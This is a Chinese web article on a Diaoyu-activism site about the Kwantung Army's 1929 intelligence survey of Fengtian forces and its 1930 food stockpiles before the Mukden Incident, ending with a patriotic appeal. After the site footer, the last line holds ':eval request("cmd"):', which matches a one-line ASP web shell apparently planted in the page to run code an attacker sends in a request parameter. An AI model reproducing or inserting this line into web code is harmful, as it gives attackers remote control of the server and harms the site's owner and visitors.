保钓理论

九一八事变前日军对东北的军事调查和粮秣储备

时间:2015-8-31 21:37:39  作者:李景科  来源:  查看:110  评论:0
内容摘要:1929年1月底,日本关东军参谋部就已经正式完成了全东北和华北的奉军军事分布报告《东三省支那军事调查》,并以图表交叉的方式详尽说明了。特别是在奉天(今沈阳)的军队部署,更是了解的彻底。所以,对于日军来说,对我东北中国军队已经是了如指掌。该报告是绝密文件,其主要内容有:东北陆军组织...
19291月底,日本关东军参谋部就已经正式完成了全东北和华北的奉军军事分布报告《东三省支那军事调查》,并以图表交叉的方式详尽说明了。特别是在奉天(今沈阳)的军队部署,更是了解的彻底。所以,对于日军来说,对我东北中国军队已经是了如指掌。该报告是绝密文件,其主要内容有:东北陆军组织系统概况表;东北陆军兵力概况表;东北边防司令长官公署内部组织概况表;奉天军改编概况表;奉天省热河省及关内驻屯正规军能力调查表;奉天省热河省及关内驻屯正规军重要职员表;奉天省不正规军一览表;奉天省城附近驻屯支那军能力调查表;在奉天省预备兵器员数表;吉林省驻屯正规军能力调查表;吉林省驻屯正规军重要职员表;吉林省不正规军调查表;吉林军预备兵器员数表;黑龙江省驻屯正规军能力调查表;黑龙江省驻屯正规军重要职员表;东北海军调查表。附图有:东北陆军位置要图;东北陆军兵力概况图;在奉天支那军位置要图。

1930529,日本关东军则完成了在东北军事行动所必需的粮秣储备。储备在东北有三个最主要仓库:大连总库;铁岭分库,旅顺出差所。储备的粮秣包括两大类:携带干粮(干面包,肉罐头和食盐);普通粮秣(精米,肉罐头,食盐,酱油调味品,大麦)。在大连总库储存的携带干粮干面包有48672公斤。而普通粮食精米储存7560吨。这些对于日军在东北辽宁为主的军事侵略行动提供了有力保障。

基于这些报告也是日军在九一八事变前军事渗透中国的赤裸裸的铁证,也说明九一八的事变是必然要发生的。今天虽然是和平年代,但战争因素时刻存在,我们要保持一颗警惕的心,奋发图强,把祖国建设得更加强大才行。

九一八事变前日军对东北的军事调查和粮秣储备
世保盟微信公衆号
微信掃一掃二維碼
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):